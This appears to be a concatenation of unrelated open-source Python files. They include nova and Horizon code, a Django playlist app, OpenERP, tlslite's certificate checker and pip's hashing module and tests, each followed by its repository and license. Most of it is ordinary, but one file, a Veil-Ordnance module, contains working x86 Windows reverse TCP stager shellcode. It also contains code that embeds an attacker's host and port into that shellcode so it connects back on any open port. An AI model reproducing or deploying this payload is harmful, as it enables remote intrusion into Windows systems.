'nova.network.neutronv2.api.API' _IS_NEUTRON_ATTEMPTED = True from nova.network.neutronv2 import api as neutron_api _IS_NEUTRON = issubclass(importutils.import_class(cls_name), neutron_api.API) except ImportError: _IS_NEUTRON = False return _IS_NEUTRON def reset_is_neutron(): global _IS_NEUTRON_ATTEMPTED global _IS_NEUTRON _IS_NEUTRON_ATTEMPTED = False _IS_NEUTRON = False def is_auto_disk_config_disabled(auto_disk_config_raw): auto_disk_config_disabled = False if auto_disk_config_raw is not None: adc_lowered = auto_disk_config_raw.strip().lower() if adc_lowered == "disabled": auto_disk_config_disabled = True return auto_disk_config_disabled def get_auto_disk_config_from_instance(instance=None, sys_meta=None): if sys_meta is None: sys_meta = 
instance_sys_meta(instance) return sys_meta.get("image_auto_disk_config") def get_auto_disk_config_from_image_props(image_properties): return image_properties.get("auto_disk_config") def get_system_metadata_from_image(image_meta, flavor=None): system_meta = {} prefix_format = SM_IMAGE_PROP_PREFIX + '%s' for key, value in image_meta.get('properties', {}).iteritems(): new_value = unicode(value)[:255] system_meta[prefix_format % key] = new_value for key in SM_INHERITABLE_KEYS: value = image_meta.get(key) if key == 'min_disk' and flavor: if image_meta.get('disk_format') == 'vhd': value = flavor['root_gb'] else: value = max(value, flavor['root_gb']) if value is None: continue system_meta[prefix_format % key] = value return system_meta def get_image_from_system_metadata(system_meta): image_meta = {} properties = {} if not isinstance(system_meta, dict): system_meta = metadata_to_dict(system_meta) for key, value in system_meta.iteritems(): if value is None: continue # NOTE(xqueralt): Not sure this has to inherit all the properties or # just the ones we need. Leaving it for now to keep the old behaviour. if key.startswith(SM_IMAGE_PROP_PREFIX): key = key[len(SM_IMAGE_PROP_PREFIX):] if key in SM_INHERITABLE_KEYS: image_meta[key] = value else: # Skip properties that are non-inheritable if key in CONF.non_inheritable_image_properties: continue properties[key] = value if properties: image_meta['properties'] = properties return image_meta def get_hash_str(base_str): """returns string that represents hash of base_str (in hex format).""" return hashlib.md5(base_str).hexdigest()
apache-2.0
robforsythe/tune
tune/views.py
1
10964
from tune.models import User, Playlist, Artist, Album, Track, PlaylistSong from django.shortcuts import redirect, render, get_object_or_404 from django.contrib.auth import authenticate, login, logout from django.core.cache import cache from json import loads, dumps from urllib2 import urlopen # TODO @login_required decorator for: # new, create, update, delete, search, detail # We layer cache accesses over most db accesses and requests; cache is # always checked first for a quicker alternative (!!) # select_related: retrieves related FK tables via a single complex query, # so later use of FK relationships don't require extra queries # downside: too much information can potentially be retrieved # rule of thumb: use for joining one-to-one relationships via FK ## Homepage function ## def index(request): ''' index - displays all created playlists ''' # check cache; if not there, hit db. DON'T set cache here. # commented out because stale values are prevented # playlists = cache.get("Playlists") # if not playlists: # playlists = Playlist.objects.select_related().all() playlists = Playlist.objects.select_related().all() context = { 'playlists': playlists } return render(request, 'tune/index.html', context) ## User functions ## def userLogin(request): ''' render login page if not already logged in, else redirect to index ''' if not request.user.is_authenticated(): return render(request, 'tune/login.html') else: return render(request, 'tune/index.html') def userLogout(request): ''' logout, redirect to index ''' logout(request) return redirect('index') def validateUser(request): ''' validates User creds, or create a new User if nonexistent username ''' uname, pword = request.POST['username'], request.POST['password'] # try and retrieve existing User try: user = cache.get(uname) if not user: user = User.objects.get(username=uname) cache.set(uname, user) user = authenticate(username=uname, password=pword) # password verified if user is not None: login(request, user) else: 
return render(request, 'tune/err.html', { 'pass': True }) # user doesn't exist except User.DoesNotExist: User.objects.create_user(username=uname, password=pword) user = authenticate(username=uname, password=pword) login(request, user) cache.set(uname, user) return redirect('index') ## Search functions ## def search(request): ''' return results of a query made to the spotify API ''' # if user isn't authenticated, render login page if not request.user.is_authenticated(): return render(request, 'tune/login.html') if request.GET['query']: query = request.GET['query'].encode('utf-8').replace(' ', '%20') url = 'http://ws.spotify.com/search/1/{}.json?q={}' # check if search has been performed recently results = cache.get(query) # if the request isn't in the cache, perform query if not results: results = { } for queryType in ['album', 'artist', 'track']: prl = url.format(queryType, query) searchResults = loads(urlopen(prl).read())["{}s".format(queryType)] results[queryType] = searchResults # add to cache after the request cache.set(query, results) # add this user's playlists to the cache plists = cache.get("{}Playlists".format(request.user.username)) if not plists: plists = Playlist.objects.select_related().filter(author=request.user) cache.set("{}Playlists".format(request.user.username), plists) context = { 'form': True, 'results': results, 'playlists': plists, 'json': dumps(results), 'query': request.GET['query'] } return render(request, 'tune/search.html', context) else: return render(request, 'tune/err.html', { 'emptyQuery': True }) def detail(request, href): ''' return in-depth search results ''' queryType = href.split(':')[1] if queryType == 'artist': url = 'http://ws.spotify.com/lookup/1/.json?uri={}&extras=album' else: url = 'http://ws.spotify.com/lookup/1/.json?uri={}&extras=trackdetail' url = url.format(href) searchResults = cache.get(url) if not searchResults: searchResults = loads(urlopen(url).read()) cache.set(url, searchResults) # context common to both 
searches context = { 'href': href, 'detail': True, 'queryType': queryType, 'results': searchResults[queryType], 'name': searchResults[queryType]['name'] } # missing if queryType == 'album': context['form'] = True plists = cache.get("{}Playlists".format(request.user.username)) if not plists: plists = Playlist.objects.select_related().filter(author=request.user) context['playlists'] = plists context['json'] = dumps(searchResults[queryType]) return render(request, 'tune/search.html', context) ## PlaylistSong manipulation functions ## # addTrack helper method def getTrackInfo(queryType, args): data = cache.get(args['href']) if not data: if queryType == 'artist': try: data = Artist.objects.get(**args) except Artist.DoesNotExist: data = Artist(**args) data.save() elif queryType == 'album': try: data = Album.objects.get(**args) except Album.DoesNotExist: data = Album(**args) data.save() elif queryType == 'track': try: data = Track.objects.get(**args) except Track.DoesNotExist: data = Track(**args) data.save() cache.set(args['href'], data) return data def addTracks(request): ''' add track(s) to playlist(s) ''' # default value format: # [ # TrackName::TrackLength::ArtistName::AlbumName:: # AlbumHREF::TrackHREF::ArtistHREF::PlaylistID # ] # 3 bulk creates should add all to db; problem is duplicates # TODO would a raw SQL query be faster? (e.g. INSERT IGNORE INTO ...) 
for track in request.POST: if track != 'csrfmiddlewaretoken': data = request.POST[track].split('::') # try and get artist/album/track href from cache # if not in cache, hit the database; if not in db, create # afterwards, add new playlist-song relationship to db a = getTrackInfo('artist', { 'href': data[6], 'name': data[2] }) b = getTrackInfo('album', { 'href': data[4], 'name': data[3], 'artist': a }) c = getTrackInfo('track', { 'href': data[5], 'name': data[0], 'length': data[1], 'artist': a, 'album': b }) # add track to the PlaylistSong model p = cache.get("Playlist{}".format(data[7])) if not p: p = Playlist.objects.get(pk=int(data[7])) cache.set("Playlist{}".format(data[7]), p) # TODO store this value in cache? PlaylistSong.objects.create(playlist=p, track=c) return redirect('index') ## CRUD functions ## def new(request): ''' route to the playlist creation page ''' if request.user.is_authenticated(): return render(request, 'tune/form.html') else: return render(request, 'tune/err.html') def create(request): ''' create/edit a playlist, redirect to 'show' page after completion ''' # convert to dict to properly retrieve list data myDict = dict(request.POST.iterlists()) currID = request.POST.get('currID', None) # if updating, check cache and db; otherwise, create a new playlist if currID: playlist = cache.get("Playlist{}".format(request.POST['currID'])) if not playlist: playlist = Playlist.objects.get(pk=currID) playlist.name = request.POST['pName'] else: playlist = Playlist(name=request.POST['pName'], author=request.user) playlist.save() # set a new value for "Playlists" in the cache because we added one # cache.set("Playlists", Playlist.objects.select_related().all()) cache.set("Playlist{}".format(playlist.pk), playlist) # sample POST data: # # 'deleted': [ # u'spotify:track:7u5dBtASrtOuBTTZjJrvuJ', # u'spotify:track:07q6QTQXyPRCf7GbLakRPr', # u'spotify:track:7u5dBtASrtOuBTTZjJrvuJ' # (duplicate) # ] deleted = request.POST.get('deleted', None) # p = list of 
playlist-song relationships for this playlist if deleted: p = cache.get(playlist.pk) if not p: p = PlaylistSong.objects.select_related('track').filter( playlist=playlist) cache.set("PS{}".format(playlist.pk), p) # for each relationship: if href matches, then delete the record # then, break in order to avoid the duplicate case # (deleting multiple copies of the same track in a playlist) for href in myDict['deleted']: for link in p: if link.track.href == href: link.delete() break return redirect('show', playlist.pk) def show(request, pID): ''' display a playlist and the songs it contains ''' playlist = get_object_or_404(Playlist, pk=pID) # get all PlaylistSong objects associated with this playlist # e.g. [<p1, 'song1'>, <p1, 'song3'>, ... ] tracks = cache.get(playlist.pk) if not tracks: tracks = PlaylistSong.objects.select_related().filter(playlist=playlist) cache.set("PS{}".format(playlist.pk), tracks) context = { 'name': playlist.name, 'author': playlist.author, 'tracks': tracks } return render(request, 'tune/show.html', context) def update(request, pID): ''' send context to form and allow user to update properties ''' playlist = get_object_or_404(Playlist, pk=pID) if request.user.is_authenticated(): if playlist.author.username != request.user.username: return render(request, 'tune/err.html', { 'noAccess': True }) tracks = cache.get("PS{}".format(playlist.pk)) if not tracks: tracks = PlaylistSong.objects.select_related().filter(playlist=playlist) cache.set("PS{}".format(playlist.pk), tracks) # get existing playlist information context = { 'existing': True, 'name': playlist.name, 'author': playlist.author, 'currID': playlist.pk, 'tracks': tracks } return render(request, 'tune/form.html', context) else: return render(request, 'tune/err.html') def delete(request, pID): ''' delete playlist and redirect to index page ''' if request.user.is_authenticated(): playlist = Playlist.objects.get(pk=pID) if playlist.author.username != request.user.username: return 
render(request, 'tune/err.html', { 'noAccess': True }) else: cache.delete("Playlist{}".format(playlist.pk)) playlist.delete() return redirect('index') else: return render(request, 'tune/err.html')
mit
aricchen/openHR
openerp/addons/account_report_company/account_report_company.py
7
2316
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Business Applications # Copyright (c) 2013 S.A. <http://openerp.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import osv, fields class res_partner(osv.Model): _inherit = 'res.partner' _order = 'display_name' def _display_name_compute(self, cr, uid, ids, name, args, context=None): return dict(self.name_get(cr, uid, ids, context=context)) _display_name_store_triggers = { 'res.partner': (lambda self,cr,uid,ids,context=None: self.search(cr, uid, [('id','child_of',ids)]), ['parent_id', 'is_company', 'name'], 10) } # indirection to avoid passing a copy of the overridable method when declaring the function field _display_name = lambda self, *args, **kwargs: self._display_name_compute(*args, **kwargs) _columns = { # extra field to allow ORDER BY to match visible names 'display_name': fields.function(_display_name, type='char', string='Name', store=_display_name_store_triggers), } class account_invoice(osv.Model): _inherit = 'account.invoice' _columns = { 'commercial_partner_id': fields.related('partner_id', 'commercial_partner_id', string='Commercial Entity', type='many2one', relation='res.partner', store=True, readonly=True, help="The commercial 
entity that will be used on Journal Entries for this invoice") }
agpl-3.0
Exploit-install/Veil-Ordnance
payloads/x86/rev_tcp_all_ports.py
3
5899
# This is the reverse_tcp payload, completely ported from the Metasploit # Framework. # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/reverse_tcp.rb import binascii import re import socket import sys class RevTCPAP: def __init__(self): self.name = "Reverse TCP All Ports Stager (Stage 1)" self.description = "Attempts to egress bust by trying all ports!" self.platform = "Windows" self.arch = "x86" self.lport = 4444 self.lhost = None self.retries_offset = 192 self.lhost_offset = 195 self.lport_offset = 202 self.exitfunc_offset = 226 self.exit_func = '\xf0\xb5\xa2\x56' self.customized_shellcode = '' self.stager = ( "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" + "\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" + "\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" + "\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" + "\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" + "\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" + "\xC6\x85\xF6\x75\xEC\xC3") def set_attrs(self, lport_value, lhost_value): self.lport = 
lport_value # Check if given a domain or IP address: if self.validate_ip(lhost_value): self.lhost = lhost_value else: try: self.lhost = socket.gethostbyname(lhost_value) except socket.gaierror: print "[*] Error: Invalid domain or IP provided for LHOST value!" print "[*] Error: Please re-run with the correct value." sys.exit() return def gen_shellcode(self): # Take the passed in attributes and gen shellcode ip_shellcode = '' n = 2 ip_shellcode_stage = binascii.hexlify(socket.inet_aton(self.lhost)) ip_shellcode_stage = [ip_shellcode_stage[i:i+n] for i in range(0, len(ip_shellcode_stage), n)] for two_bytes in ip_shellcode_stage: ip_shellcode += '\\x' + two_bytes # convert port to shellcode port_shellcode_stage = str(hex(self.lport).lstrip('0')) if len(port_shellcode_stage.lstrip('x')) == 3: # detect if odd number, is so, need to add a '0' to the front port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') port_1half = '\\x' + port_1half port_2half = port_shellcode_stage[2:4] port_2half = '\\x' + port_2half port_shellcode = port_1half + port_2half elif len(port_shellcode_stage.lstrip('x')) == 4: port_1half = port_shellcode_stage[1:3] port_1half = '\\x' + port_1half port_2half = port_shellcode_stage[3:5] port_2half = '\\x' + port_2half port_shellcode = port_1half + port_2half elif len(port_shellcode_stage.lstrip('x')) == 2: port_1half = port_shellcode_stage[1:3].lstrip('x') port_1half = '\\x' + port_1half port_2half = '00' port_2half = '\\x' + port_2half port_shellcode = port_2half + port_1half elif len(port_shellcode_stage.lstrip('x')) == 1: port_1half = port_shellcode_stage.lstrip('x') port_1half = '\\x0' + port_1half port_2half = '\\x00' port_shellcode = port_2half + port_1half stager_shellcode = self.stager[0:self.lhost_offset] stager_shellcode += ip_shellcode.decode('string-escape') stager_shellcode += self.stager[self.lhost_offset + 4:self.lport_offset] stager_shellcode += port_shellcode.decode('string-escape') stager_shellcode += self.stager[self.lport_offset + 
2:] self.customized_shellcode = "\\x" + '\\x'.join(stager_shellcode.encode('hex')[i:i+2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) return def print_shellcode(self): print self.customized_shellcode return def payload_stats(self, cli_info): print "Payload Name: " + self.name print "IP Address: " + cli_info.ip print "Port: " + str(cli_info.port) print "Shellcode Size: " + str(len(self.customized_shellcode.decode('string-escape'))) + '\n' return def validate_ip(self, val_ip): # This came from (Mult-line link for pep8 compliance) # http://python-iptools.googlecode.com/svn-history/r4 # /trunk/iptools/__init__.py ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$') if ip_re.match(val_ip): quads = (int(q) for q in val_ip.split('.')) for q in quads: if q > 255: return False return True return False
gpl-3.0
spandanb/horizon
openstack_dashboard/dashboards/project/routers/extensions/routerrules/tables.py
1
2774
# Copyright 2013, Big Switch Networks, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from django.utils.translation import ugettext_lazy as _ from openstack_dashboard.dashboards.project.routers.extensions.routerrules\ import rulemanager from horizon import tables LOG = logging.getLogger(__name__) class AddRouterRule(tables.LinkAction): name = "create" verbose_name = _("Add Router Rule") url = "horizon:project:routers:addrouterrule" classes = ("ajax-modal", "btn-create") policy_rules = (("network", "update_router"),) def get_policy_target(self, request, datum=None): project_id = None if datum: project_id = getattr(datum, 'tenant_id', None) return {"project_id": project_id} def get_link_url(self, datum=None): router_id = self.table.kwargs['router_id'] return reverse(self.url, args=(router_id,)) class RemoveRouterRule(tables.DeleteAction): data_type_singular = _("Router Rule") data_type_plural = _("Router Rules") failure_url = 'horizon:project:routers:detail' policy_rules = (("network", "update_router"),) def get_policy_target(self, request, datum=None): project_id = None if datum: project_id = getattr(datum, 'tenant_id', None) return {"project_id": project_id} def delete(self, request, obj_id): router_id = self.table.kwargs['router_id'] rulemanager.remove_rules(request, [obj_id], router_id=router_id) class RouterRulesTable(tables.DataTable): source = tables.Column("source", verbose_name=_("Source CIDR")) destination = 
tables.Column("destination", verbose_name=_("Destination CIDR")) action = tables.Column("action", verbose_name=_("Action")) nexthops = tables.Column("nexthops", verbose_name=_("Next Hops")) def get_object_display(self, rule): return "(%(action)s) %(source)s -> %(destination)s" % rule class Meta: name = "routerrules" verbose_name = _("Router Rules") table_actions = (AddRouterRule, RemoveRouterRule) row_actions = (RemoveRouterRule, )
apache-2.0
aospx-kitkat/platform_external_chromium_org
third_party/tlslite/tlslite/Checker.py
359
6301
"""Class for post-handshake certificate checking.""" from utils.cryptomath import hashAndBase64 from X509 import X509 from X509CertChain import X509CertChain from errors import * class Checker: """This class is passed to a handshake function to check the other party's certificate chain. If a handshake function completes successfully, but the Checker judges the other party's certificate chain to be missing or inadequate, a subclass of L{tlslite.errors.TLSAuthenticationError} will be raised. Currently, the Checker can check either an X.509 or a cryptoID chain (for the latter, cryptoIDlib must be installed). """ def __init__(self, cryptoID=None, protocol=None, x509Fingerprint=None, x509TrustList=None, x509CommonName=None, checkResumedSession=False): """Create a new Checker instance. You must pass in one of these argument combinations: - cryptoID[, protocol] (requires cryptoIDlib) - x509Fingerprint - x509TrustList[, x509CommonName] (requires cryptlib_py) @type cryptoID: str @param cryptoID: A cryptoID which the other party's certificate chain must match. The cryptoIDlib module must be installed. Mutually exclusive with all of the 'x509...' arguments. @type protocol: str @param protocol: A cryptoID protocol URI which the other party's certificate chain must match. Requires the 'cryptoID' argument. @type x509Fingerprint: str @param x509Fingerprint: A hex-encoded X.509 end-entity fingerprint which the other party's end-entity certificate must match. Mutually exclusive with the 'cryptoID' and 'x509TrustList' arguments. @type x509TrustList: list of L{tlslite.X509.X509} @param x509TrustList: A list of trusted root certificates. The other party must present a certificate chain which extends to one of these root certificates. The cryptlib_py module must be installed. Mutually exclusive with the 'cryptoID' and 'x509Fingerprint' arguments. @type x509CommonName: str @param x509CommonName: The end-entity certificate's 'CN' field must match this value. 
For a web server, this is typically a server name such as 'www.amazon.com'. Mutually exclusive with the 'cryptoID' and 'x509Fingerprint' arguments. Requires the 'x509TrustList' argument. @type checkResumedSession: bool @param checkResumedSession: If resumed sessions should be checked. This defaults to False, on the theory that if the session was checked once, we don't need to bother re-checking it. """ if cryptoID and (x509Fingerprint or x509TrustList): raise ValueError() if x509Fingerprint and x509TrustList: raise ValueError() if x509CommonName and not x509TrustList: raise ValueError() if protocol and not cryptoID: raise ValueError() if cryptoID: import cryptoIDlib #So we raise an error here if x509TrustList: import cryptlib_py #So we raise an error here self.cryptoID = cryptoID self.protocol = protocol self.x509Fingerprint = x509Fingerprint self.x509TrustList = x509TrustList self.x509CommonName = x509CommonName self.checkResumedSession = checkResumedSession def __call__(self, connection): """Check a TLSConnection. When a Checker is passed to a handshake function, this will be called at the end of the function. @type connection: L{tlslite.TLSConnection.TLSConnection} @param connection: The TLSConnection to examine. @raise tlslite.errors.TLSAuthenticationError: If the other party's certificate chain is missing or bad. 
""" if not self.checkResumedSession and connection.resumed: return if self.cryptoID or self.x509Fingerprint or self.x509TrustList: if connection._client: chain = connection.session.serverCertChain else: chain = connection.session.clientCertChain if self.x509Fingerprint or self.x509TrustList: if isinstance(chain, X509CertChain): if self.x509Fingerprint: if chain.getFingerprint() != self.x509Fingerprint: raise TLSFingerprintError(\ "X.509 fingerprint mismatch: %s, %s" % \ (chain.getFingerprint(), self.x509Fingerprint)) else: #self.x509TrustList if not chain.validate(self.x509TrustList): raise TLSValidationError("X.509 validation failure") if self.x509CommonName and \ (chain.getCommonName() != self.x509CommonName): raise TLSAuthorizationError(\ "X.509 Common Name mismatch: %s, %s" % \ (chain.getCommonName(), self.x509CommonName)) elif chain: raise TLSAuthenticationTypeError() else: raise TLSNoAuthenticationError() elif self.cryptoID: import cryptoIDlib.CertChain if isinstance(chain, cryptoIDlib.CertChain.CertChain): if chain.cryptoID != self.cryptoID: raise TLSFingerprintError(\ "cryptoID mismatch: %s, %s" % \ (chain.cryptoID, self.cryptoID)) if self.protocol: if not chain.checkProtocol(self.protocol): raise TLSAuthorizationError(\ "cryptoID protocol mismatch") if not chain.validate(): raise TLSValidationError("cryptoID validation failure") elif chain: raise TLSAuthenticationTypeError() else: raise TLSNoAuthenticationError()
bsd-3-clause
dessHub/bc-14-online-store-application
flask/lib/python2.7/site-packages/pip/utils/hashes.py
517
2866
from __future__ import absolute_import import hashlib from pip.exceptions import HashMismatch, HashMissing, InstallationError from pip.utils import read_chunks from pip._vendor.six import iteritems, iterkeys, itervalues # The recommended hash algo of the moment. Change this whenever the state of # the art changes; it won't hurt backward compatibility. FAVORITE_HASH = 'sha256' # Names of hashlib algorithms allowed by the --hash option and ``pip hash`` # Currently, those are the ones at least as collision-resistant as sha256. STRONG_HASHES = ['sha256', 'sha384', 'sha512'] class Hashes(object): """A wrapper that builds multiple hashes at once and checks them against known-good values """ def __init__(self, hashes=None): """ :param hashes: A dict of algorithm names pointing to lists of allowed hex digests """ self._allowed = {} if hashes is None else hashes def check_against_chunks(self, chunks): """Check good hashes against ones built from iterable of chunks of data. Raise HashMismatch if none match. """ gots = {} for hash_name in iterkeys(self._allowed): try: gots[hash_name] = hashlib.new(hash_name) except (ValueError, TypeError): raise InstallationError('Unknown hash name: %s' % hash_name) for chunk in chunks: for hash in itervalues(gots): hash.update(chunk) for hash_name, got in iteritems(gots): if got.hexdigest() in self._allowed[hash_name]: return self._raise(gots) def _raise(self, gots): raise HashMismatch(self._allowed, gots) def check_against_file(self, file): """Check good hashes against a file-like object Raise HashMismatch if none match. 
""" return self.check_against_chunks(read_chunks(file)) def check_against_path(self, path): with open(path, 'rb') as file: return self.check_against_file(file) def __nonzero__(self): """Return whether I know any known-good hashes.""" return bool(self._allowed) def __bool__(self): return self.__nonzero__() class MissingHashes(Hashes): """A workalike for Hashes used when we're missing a hash for a requirement It computes the actual hash of the requirement and raises a HashMissing exception showing it to the user. """ def __init__(self): """Don't offer the ``hashes`` kwarg.""" # Pass our favorite hash in to generate a "gotten hash". With the # empty list, it will never match, so an error will always raise. super(MissingHashes, self).__init__(hashes={FAVORITE_HASH: []}) def _raise(self, gots): raise HashMissing(gots[FAVORITE_HASH].hexdigest())
gpl-3.0
benesch/pip
tests/unit/test_req_file.py
6
22259
"""Unit tests for pip.req.req_file (requirements-file parsing)."""
import os
import subprocess
import textwrap

from mock import patch, Mock
import pytest
from pretend import stub

import pip
from pip.exceptions import (InstallationError, RequirementsFileParseError)
from pip.download import PipSession
from pip.index import PackageFinder
from pip.req.req_install import InstallRequirement
from pip.req.req_file import (parse_requirements, process_line, join_lines,
                              ignore_comments, break_args_options, skip_regex,
                              preprocess)
from tests.lib import requirements_file


@pytest.fixture
def session():
    return PipSession()


@pytest.fixture
def finder(session):
    return PackageFinder([], [], session=session)


@pytest.fixture
def options(session):
    return stub(
        isolated_mode=False, default_vcs=None, index_url='default_url',
        skip_requirements_regex=False,
        format_control=pip.index.FormatControl(set(), set()))


class TestPreprocess(object):
    """tests for `preprocess`"""

    def test_comments_and_joins_case1(self):
        content = textwrap.dedent("""\
          req1 \\
          # comment \\
          req2
        """)
        result = preprocess(content, None)
        assert list(result) == [(1, 'req1'), (3, 'req2')]

    def test_comments_and_joins_case2(self):
        content = textwrap.dedent("""\
          req1\\
          # comment
        """)
        result = preprocess(content, None)
        assert list(result) == [(1, 'req1')]

    def test_comments_and_joins_case3(self):
        content = textwrap.dedent("""\
          req1 \\
          # comment
          req2
        """)
        result = preprocess(content, None)
        assert list(result) == [(1, 'req1'), (3, 'req2')]

    def test_skip_regex_after_joining_case1(self, options):
        content = textwrap.dedent("""\
          patt\\
          ern
          line2
        """)
        options.skip_requirements_regex = 'pattern'
        result = preprocess(content, options)
        assert list(result) == [(3, 'line2')]

    def test_skip_regex_after_joining_case2(self, options):
        content = textwrap.dedent("""\
          pattern \\
          line2
          line3
        """)
        options.skip_requirements_regex = 'pattern'
        result = preprocess(content, options)
        assert list(result) == [(3, 'line3')]


class TestIgnoreComments(object):
    """tests for `ignore_comments`"""

    def test_ignore_line(self):
        lines = [(1, ''), (2, 'req1'), (3, 'req2')]
        result = ignore_comments(lines)
        assert list(result) == [(2, 'req1'), (3, 'req2')]

    def test_ignore_comment(self):
        lines = [(1, 'req1'), (2, '# comment'), (3, 'req2')]
        result = ignore_comments(lines)
        assert list(result) == [(1, 'req1'), (3, 'req2')]

    def test_strip_comment(self):
        lines = [(1, 'req1'), (2, 'req # comment'), (3, 'req2')]
        result = ignore_comments(lines)
        assert list(result) == [(1, 'req1'), (2, 'req'), (3, 'req2')]


class TestJoinLines(object):
    """tests for `join_lines`"""

    def test_join_lines(self):
        lines = enumerate([
            'line 1',
            'line 2:1 \\',
            'line 2:2',
            'line 3:1 \\',
            'line 3:2 \\',
            'line 3:3',
            'line 4'
        ], start=1)
        expect = [
            (1, 'line 1'),
            (2, 'line 2:1 line 2:2'),
            (4, 'line 3:1 line 3:2 line 3:3'),
            (7, 'line 4'),
        ]
        assert expect == list(join_lines(lines))

    def test_last_line_with_escape(self):
        lines = enumerate([
            'line 1',
            'line 2 \\',
        ], start=1)
        expect = [
            (1, 'line 1'),
            (2, 'line 2 '),
        ]
        assert expect == list(join_lines(lines))


class TestSkipRegex(object):
    """tests for `skip_regex`"""

    def test_skip_regex_pattern_match(self):
        options = stub(skip_requirements_regex='.*Bad.*')
        line = '--extra-index-url Bad'
        assert [] == list(skip_regex(enumerate([line]), options))

    def test_skip_regex_pattern_not_match(self):
        options = stub(skip_requirements_regex='.*Bad.*')
        line = '--extra-index-url Good'
        assert [(0, line)] == list(skip_regex(enumerate([line]), options))

    def test_skip_regex_no_options(self):
        options = None
        line = '--extra-index-url Good'
        assert [(0, line)] == list(skip_regex(enumerate([line]), options))

    def test_skip_regex_no_skip_option(self):
        options = stub(skip_requirements_regex=None)
        line = '--extra-index-url Good'
        assert [(0, line)] == list(skip_regex(enumerate([line]), options))


class TestProcessLine(object):
    """tests for `process_line`"""

    def test_parser_error(self):
        with pytest.raises(RequirementsFileParseError):
            list(process_line("--bogus", "file", 1))

    def test_only_one_req_per_line(self):
        # pkg_resources raises the ValueError
        with pytest.raises(InstallationError):
            list(process_line("req1 req2", "file", 1))

    def test_yield_line_requirement(self):
        line = 'SomeProject'
        filename = 'filename'
        comes_from = '-r %s (line %s)' % (filename, 1)
        req = InstallRequirement.from_line(line, comes_from=comes_from)
        assert repr(list(process_line(line, filename, 1))[0]) == repr(req)

    def test_yield_line_constraint(self):
        line = 'SomeProject'
        filename = 'filename'
        comes_from = '-c %s (line %s)' % (filename, 1)
        req = InstallRequirement.from_line(
            line, comes_from=comes_from, constraint=True)
        found_req = list(process_line(line, filename, 1, constraint=True))[0]
        assert repr(found_req) == repr(req)
        assert found_req.constraint is True

    def test_yield_line_requirement_with_spaces_in_specifier(self):
        line = 'SomeProject >= 2'
        filename = 'filename'
        comes_from = '-r %s (line %s)' % (filename, 1)
        req = InstallRequirement.from_line(line, comes_from=comes_from)
        assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
        assert str(req.req.specifier) == '>=2'

    def test_yield_editable_requirement(self):
        url = 'git+https://url#egg=SomeProject'
        line = '-e %s' % url
        filename = 'filename'
        comes_from = '-r %s (line %s)' % (filename, 1)
        req = InstallRequirement.from_editable(url, comes_from=comes_from)
        assert repr(list(process_line(line, filename, 1))[0]) == repr(req)

    def test_yield_editable_constraint(self):
        url = 'git+https://url#egg=SomeProject'
        line = '-e %s' % url
        filename = 'filename'
        comes_from = '-c %s (line %s)' % (filename, 1)
        req = InstallRequirement.from_editable(
            url, comes_from=comes_from, constraint=True)
        found_req = list(process_line(line, filename, 1, constraint=True))[0]
        assert repr(found_req) == repr(req)
        assert found_req.constraint is True

    def test_nested_requirements_file(self, monkeypatch):
        line = '-r another_file'
        req = InstallRequirement.from_line('SomeProject')
        import pip.req.req_file

        def stub_parse_requirements(req_url, finder, comes_from, options,
                                    session, wheel_cache, constraint):
            return [(req, constraint)]
        parse_requirements_stub = stub(call=stub_parse_requirements)
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            parse_requirements_stub.call)
